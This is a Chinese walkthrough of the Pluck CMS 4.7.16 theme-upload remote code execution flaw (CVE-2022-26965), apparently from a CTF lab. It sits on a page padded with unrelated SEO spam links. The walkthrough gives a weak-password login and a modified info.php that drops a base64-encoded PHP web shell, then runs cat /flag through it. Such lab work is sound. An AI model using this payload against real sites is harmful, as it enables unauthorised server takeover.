当前位置: 首页 > news >正文

网站提高banner图打开速度培训网站推荐

网站提高banner图打开速度,培训网站推荐,快速学电脑培训班,微信号30元一个自动发货简介 CVE-2022-26965是Pluck CMS 4.7.16版本存在一个远程shell上传执行漏洞。 攻击者可利用此漏洞通过构造恶意的主题包进行上传并执行,未经授权访问服务器,造成潜在的安全隐患。 过程 1.打开环境,查看源码,发现login.php 2.进…

简介

CVE-2022-26965是Pluck CMS 4.7.16版本存在一个远程shell上传执行漏洞

攻击者可利用此漏洞通过构造恶意的主题包进行上传并执行,未经授权访问服务器,造成潜在的安全隐患。

过程

1.打开环境,查看源码,发现login.php

2.进入查看,登陆页面,弱口令admin进行登录,全英文界面,可以翻译的哈

3.找到上传cms主题界面

4.去github下载相对应的版本主题,随便下载一个就行

https://github.com/billcreswell/redline-theme

5.下载完成之后将文件里面的info.php里面的内容修改为下面的代码

<?phpfile_put_contents('testshell.php',base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWzFdKTs/Pg=='));?>

解释:使用file_put_contents函数将经过Base64解码后的字符串写入一个名为testshell.php的文件。

6.修改好的文件进行上传

文件上传成功。

7.连接

http://eci-2ze33y4rj8565dqp15iy.cloudeci1.ichunqiu.com/testshell.php?1=cat%20/flag

成功。

解决方案

这个漏洞的解决方案是升级Pluck CMS到最新版本或打上已知的修补程序。

攻击者利用该漏洞一般会执行一些恶意代码,包括上传一些特定的主题包,然后执行一些远程命令,从而获取服务器的控制权限,因此升级或打上修补程序是解决该漏洞最直接有效的方法。

除此之外,管理员还可以通过限制主题包的上传权限、对服务器进行安全扫描和加固等措施来提高系统的安全性。

http://www.yidumall.com/news/18226.html

相关文章:

  • soho建网站网站建设计划书
  • 材料网站建设有必要买优化大师会员吗
  • 网站定制开发是什么意思一个品牌的策划方案
  • 合肥网站建设需网站排名优化方案
  • 电销做网站的话术自己在家怎么做跨境电商
  • 做企业网站制作google chrome官网下载
  • 临沂哪里做网站比较好微信推广引流加精准客户
  • 怎么把网站地图上传seo推广优化培训
  • pc端移动端网站开发推广公司有哪些
  • 深圳网站设计美工今日百度小说排行榜
  • 友情链接对网站的影响潮州seo建站
  • 做网站 0元代理网站推广软件下载
  • 翔安区建设局网站疫情防控最新数据
  • 交互性强的网站汕头seo网络推广服务
  • 芜湖做网站郑州网站运营实力乐云seo
  • 做推广哪个食品网站好seo交互论坛
  • 武汉礼品定制公司星巴克seo网络推广
  • 玉溪人民政府网站建设现状万网域名查询官网
  • 销售网站建设实验报告外贸网站免费推广b2b
  • 如何用源码做网站搜索引擎大全网站
  • 沈阳网页设计课学seo需要多久
  • 零售户电商网站订货网址山东最新消息今天
  • 公司网站备案有什么用企业营销策划书
  • 网站建设分为几个时期站长之家域名
  • app和微网站的区别是什么求职seo
  • 做微商那个网站好贴吧友情链接在哪
  • 小程序网站开发seo免费工具
  • python 做网站开发吗新塘网站seo优化
  • 网站做研究生毕业论文知识营销
  • wordpress 網址隠藏seo排名优化是什么